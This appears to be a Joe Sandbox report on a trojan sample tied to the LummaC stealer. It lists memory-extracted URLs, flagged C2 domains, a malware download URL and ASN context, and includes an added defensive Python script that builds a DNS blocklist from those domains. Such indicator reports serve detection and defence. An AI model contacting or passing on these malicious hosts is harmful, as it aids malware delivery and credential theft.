https://www.youtube.com | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gravvitywio.store/ | BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshall | BW4pTs1x3V.exe | false | | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v9/users/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://cdn.discordapp.com/attachments/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://s.ytimg.com; | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/v9/stage-instances | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://www.certum.pl/CPS0 | BW4pTs1x3V.exe | false | URL Reputation: safe | unknown
https://steam.tv/ | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v9//voice/regions | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://cevcsca2021.ocsp-certum.com07 | BW4pTs1x3V.exe | false | | unknown
https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000E0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://store.steampowered.com/privacy_agreement/ | BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/points/shop/ | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w | BW4pTs1x3V.exe | false | | unknown
https://discord.com/api/v9/applications | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://sketchfab.com | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://lv.queniujq.cn | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/ | BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://www.youtube.com/ | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://cdn.discordapp.com/role-icons/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://vozmeatillu.shop/apixBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://discord.com/api/v9/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://discord.com/api/v9/09Az~~BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://dividenntykw.shop/tBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.google.com/recaptcha/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://checkout.steampowered.com/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://gravvitywio.store:443/apifiles/76561199724331900BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/useBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://discord.com/api/v9//sticker-packsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://discord.com/api/v9/oauth2/applicationsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://drawzhotdog.shop/apiBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://reinforcenh.shop/apiiBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.akamai.steamstatic.com/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZKBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://discord.com/api/v9/gatewayBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://repository.certum.pl/cevcsca2021.cer0BW4pTs1x3V.exefalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://offensivedzvju.shop/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://cdn.discordapp.com/splashes/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://store.steampowered.com/stats/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://medal.tvBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
172.67.209.193 | gravvitywio.store | United States | 13335 | CLOUDFLARENETUS | true
172.67.188.210 | dividenntykw.shop | United States | 13335 | CLOUDFLARENETUS | true
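The table above is the report's actionable network IOC set: two domains marked malicious (gravvitywio.store, dividenntykw.shop), both resolving to CLOUDFLARENETUS addresses, plus steamcommunity.com, which the sample contacted but which the report marks as not malicious. The Python script below is an added example and is not code from the Joe Sandbox report. It copies those rows into a small table, derives a domain blocklist from the rows marked malicious, and runs it over constructed resolver log lines (the log format and every line in it are invented for illustration). It matches subdomains on label boundaries rather than by plain suffix, skips malformed records instead of crashing, and classifies the IPs separately: ASN 13335 is shared Cloudflare infrastructure (the ASN context table further down lists AgentTesla, FormBook and unrelated samples on other CLOUDFLARENETUS addresses), so the domains, not the 172.67.x.x addresses, are the indicators worth blocking.

```python
"""Turn the report's IP/Domain table into a DNS-log check.

Added example; this is not code from the Joe Sandbox report. The IOC rows are
copied from the report's IP / Domain / ASN table; the resolver log format and
the log lines themselves are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass

# Rows copied from the report: (ip, domain, asn, malicious).
IOC_TABLE = [
    ("104.102.49.254", "steamcommunity.com", 16625, False),
    ("172.67.209.193", "gravvitywio.store", 13335, True),
    ("172.67.188.210", "dividenntykw.shop", 13335, True),
]

# ASN 13335 (CLOUDFLARENETUS) fronts many unrelated tenants; the report's ASN
# context table shows AgentTesla, FormBook and unrelated samples on other
# addresses in it, so an address there is not a usable block indicator.
SHARED_HOSTING_ASNS = {13335}

# Constructed resolver log shape: "<timestamp> <client> <qtype> <qname>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>A|AAAA|CNAME|TXT)\s+(?P<qname>\S+)$"
)

# Constructed sample log lines (not from the report).
SAMPLE_LOG = [
    "2024-10-02T12:55:27Z 10.0.0.15 A steamcommunity.com",          # benign per report
    "2024-10-02T12:55:28Z 10.0.0.15 A gravvitywio.store",           # C2
    "2024-10-02T12:55:29Z 10.0.0.15 A Dividenntykw.shop.",          # C2, mixed case, FQDN dot
    "2024-10-02T12:55:30Z 10.0.0.15 A cdn.gravvitywio.store",       # subdomain of C2
    "2024-10-02T12:55:31Z 10.0.0.15 A notgravvitywio.store",        # must NOT match
    "2024-10-02T12:55:32Z 10.0.0.15 A community.akamai.steamstatic.com",
    "malformed line that the parser should skip",
]


@dataclass(frozen=True)
class Hit:
    line_no: int
    qname: str
    ioc: str


def build_blocklist(table=IOC_TABLE):
    """Domains the report marks malicious, lower-cased, trailing dot stripped."""
    return {dom.rstrip(".").lower() for _ip, dom, _asn, mal in table if mal}


def domain_matches(qname, blocklist):
    """Return the matching IOC if qname equals or is a subdomain of one.

    Matching on a label boundary ("." + ioc) avoids the substring false
    positive that plain endswith(ioc) would give on notgravvitywio.store.
    """
    q = qname.rstrip(".").lower()
    for ioc in blocklist:
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None


def scan_dns_log(lines, table=IOC_TABLE):
    """Parse resolver log lines and return the queries that hit a C2 domain."""
    blocklist = build_blocklist(table)
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a query record; do not crash on junk
        ioc = domain_matches(m["qname"], blocklist)
        if ioc:
            hits.append(Hit(n, m["qname"], ioc))
    return hits


def ip_indicator_status(ip, table=IOC_TABLE):
    """Classify a table IP: 'benign', 'shared-asn' (malicious but on shared
    infrastructure, so block the domain instead) or 'usable'; None if unlisted."""
    addr = ipaddress.ip_address(ip)
    for tip, _dom, asn, mal in table:
        if ipaddress.ip_address(tip) == addr:
            if not mal:
                return "benign"
            return "shared-asn" if asn in SHARED_HOSTING_ASNS else "usable"
    return None


if __name__ == "__main__":
    for h in scan_dns_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.qname} -> {h.ioc}")
    for ip, *_ in IOC_TABLE:
        print(ip, ip_indicator_status(ip))
```

Run against the constructed log, only lines 2, 3 and 4 are reported; the steamcommunity.com and community.akamai.steamstatic.com queries are left alone because the report does not mark them malicious, and every IP in the table comes back as either benign or shared-asn, which is the reason the domains carry the detection here.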
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524036
Start date and time: 2024-10-02 14:53:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BW4pTs1x3V.exe (renamed because the original name is a hash value)
Original Sample Name: 2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509.exe
Detection: MAL
Classification: mal93.troj.evad.winEXE@3/0@11/3
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BW4pTs1x3V.exe, PID 1668, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: BW4pTs1x3V.exe
Time | Type | Description
08:55:27 | API Interceptor | 5x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name (context entries, where present, follow each row as bullets)
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown
• www.valvesoftware.com/legal.htm
172.67.209.193 | file.exe | malicious | LummaC, Stealc, Vidar
172.67.209.193 | Google_Chrome.exe | malicious | LummaC
172.67.209.193 | https://finalstepgetshere.com/uploads/beta111.zip | malicious | LummaC, Go Injector, LummaC Stealer
172.67.209.193 | file.exe | malicious | LummaC, Stealc, Vidar
Match | Associated Sample Name / URL | Detection | Threat Name (context IP follows each row as a bullet)
gravvitywio.store | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.21.16.12
gravvitywio.store | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.21.16.12
gravvitywio.store | b222.txt.ps1 | malicious | LummaC
• 104.21.16.12
gravvitywio.store | file.exe | malicious | LummaC, Stealc, Vidar
• 104.21.16.12
gravvitywio.store | file.exe | malicious | LummaC, Stealc, Vidar
• 172.67.209.193
gravvitywio.store | file.exe | malicious | LummaC, Stealc, Vidar
• 104.21.16.12
gravvitywio.store | Google_Chrome.exe | malicious | LummaC
• 172.67.209.193
gravvitywio.store | https://finalstepgetshere.com/uploads/beta111.zip | malicious | LummaC, Go Injector, LummaC Stealer
• 172.67.209.193
gravvitywio.store | file.exe | malicious | LummaC, Stealc, Vidar
• 172.67.209.193
gravvitywio.store | file.exe | malicious | LummaC
• 104.21.16.12
steamcommunity.com | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
